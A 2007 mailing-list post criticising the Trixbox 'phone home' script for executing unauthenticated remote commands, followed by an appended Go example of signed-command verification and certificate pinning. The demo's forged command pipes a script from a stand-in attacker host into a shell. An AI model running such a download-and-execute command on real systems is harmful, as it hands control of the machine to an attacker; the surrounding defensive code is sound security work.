On Mon, 2007-12-17 at 17:23 +0100, randulo wrote:
> Hi,
>
> Kerry Garrison from Fonality will be with us live to address the
> Trixbox so-called "phone home" script issue.
The fact that they gather information with a unique cookie set at install time is not the bigger issue in my opinion. The fact that they run commands issued from remote without any verification that the commands came from them (i.e. use a certificate of some type to verify identity) is a bigger issue, since it lets anyone with enough skill to DNS-poison execute commands on your trixbox. This not only opens the potential for a zombie box doing nasty stuff but also opens your phone system to others who may just abuse it for free calls, may decide to record and relay those recordings elsewhere, may ...

Self-signed certificates are cheap - they are free. It does not take much to verify the fingerprint of that certificate to ensure that someone didn't do any of the nasties that could be done. It also sets it up to be an encrypted connection to avoid MITM attacks of other types, since it is just plaintext commands that are being executed.

BTW, since this has caused confusion in the past: I have never, now or at any time in the past, had any affiliation with trixbox. I had the moniker trixter before they called themselves trixbox.

--
Trixter http://www.0xdecafbad.com Bret McDanel
Belfast +44 28 9099 6461 US +1 516 687 5200
http://www.trxtel.com the phone company that pays you!
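The check the post says is missing, as an added example that is not part of the original message and not Trixbox or Fonality code: a "phone home" client that refuses to execute a remote command unless it carries a valid signature from a pinned vendor key, is addressed to this box, and is fresh, plus the certificate-fingerprint comparison the post suggests for pinning a self-signed server cert. The envelope format, field names, box identifier and the Ed25519 key pair are all assumptions made up for the example; Ed25519 stands in for whatever public key the vendor's certificate would carry, and the TLS transport itself is not shown.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"crypto/subtle"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/hex"
	"errors"
	"fmt"
	"math/big"
	"time"
)

// CommandEnvelope is a hypothetical wire format for a remote command.
// Only Command is ever executed; the other fields exist so the client can
// verify origin (Sig over canonical()) and reject replays (IssuedAt).
type CommandEnvelope struct {
	BoxID    string // install-time identifier the client reported
	IssuedAt int64  // unix seconds; stale envelopes are rejected
	Command  string
	Sig      []byte // Ed25519 signature over canonical()
}

// canonical returns the exact bytes that are signed: every field except Sig,
// serialised deterministically so server and client agree byte for byte.
func (e CommandEnvelope) canonical() []byte {
	return []byte(fmt.Sprintf("%s\n%d\n%s", e.BoxID, e.IssuedAt, e.Command))
}

// signCommand is the server side: only the holder of the private key can
// produce an envelope the client will accept.
func signCommand(priv ed25519.PrivateKey, boxID, command string, now time.Time) CommandEnvelope {
	env := CommandEnvelope{BoxID: boxID, IssuedAt: now.Unix(), Command: command}
	env.Sig = ed25519.Sign(priv, env.canonical())
	return env
}

var (
	errBadSignature = errors.New("signature does not verify against pinned vendor key")
	errWrongBox     = errors.New("envelope addressed to a different box")
	errStale        = errors.New("envelope too old or from the future")
)

// verifyCommand is the client side. A DNS-poisoned or MITM'd server can still
// deliver bytes, but without the private key it cannot make them verify.
// Nothing may be executed unless this returns nil.
func verifyCommand(pinned ed25519.PublicKey, myBoxID string, env CommandEnvelope, now time.Time, maxAge time.Duration) error {
	if !ed25519.Verify(pinned, env.canonical(), env.Sig) {
		return errBadSignature
	}
	if subtle.ConstantTimeCompare([]byte(env.BoxID), []byte(myBoxID)) != 1 {
		return errWrongBox
	}
	age := now.Sub(time.Unix(env.IssuedAt, 0))
	if age > maxAge || age < -maxAge {
		return errStale
	}
	return nil
}

// selfSignedDER builds a throwaway self-signed certificate (hypothetical
// vendor host name) so the fingerprint check below has real DER to hash.
func selfSignedDER(priv ed25519.PrivateKey) []byte {
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1),
		Subject:      pkix.Name{CommonName: "updates.vendor.invalid"},
		NotBefore:    time.Now().Add(-time.Hour),
		NotAfter:     time.Now().Add(24 * time.Hour),
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, priv.Public(), priv)
	if err != nil {
		panic(err)
	}
	return der
}

// certFingerprint is SHA-256 over the certificate's DER encoding, the value a
// client would bake in at build time and compare against the presented cert.
func certFingerprint(der []byte) string {
	sum := sha256.Sum256(der)
	return hex.EncodeToString(sum[:])
}

func fingerprintMatches(der []byte, pinnedHex string) bool {
	return subtle.ConstantTimeCompare([]byte(certFingerprint(der)), []byte(pinnedHex)) == 1
}

func main() {
	// Key pair generated here so the example runs offline; a shipped client
	// would carry only the public key.
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	now := time.Now()
	env := signCommand(priv, "box-0001", "asterisk -rx 'core show version'", now)
	fmt.Println("genuine: ", verifyCommand(pub, "box-0001", env, now, time.Minute))

	forged := env // attacker on a poisoned DNS path swaps in their own command
	forged.Command = "curl http://attacker.invalid/bot.sh | sh"
	fmt.Println("forged:  ", verifyCommand(pub, "box-0001", forged, now, time.Minute))
	fmt.Println("replayed:", verifyCommand(pub, "box-0001", env, now.Add(24*time.Hour), time.Minute))

	der := selfSignedDER(priv)
	fmt.Println("cert fingerprint pinned:", fingerprintMatches(der, certFingerprint(der)))
}
```

Signing the command rather than only pinning the transport means a tampered envelope is rejected even if an attacker somehow obtains a certificate the box trusts; pinning the fingerprint on top of that is what turns a free self-signed certificate into a usable trust anchor, because the client never consults a CA at all.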
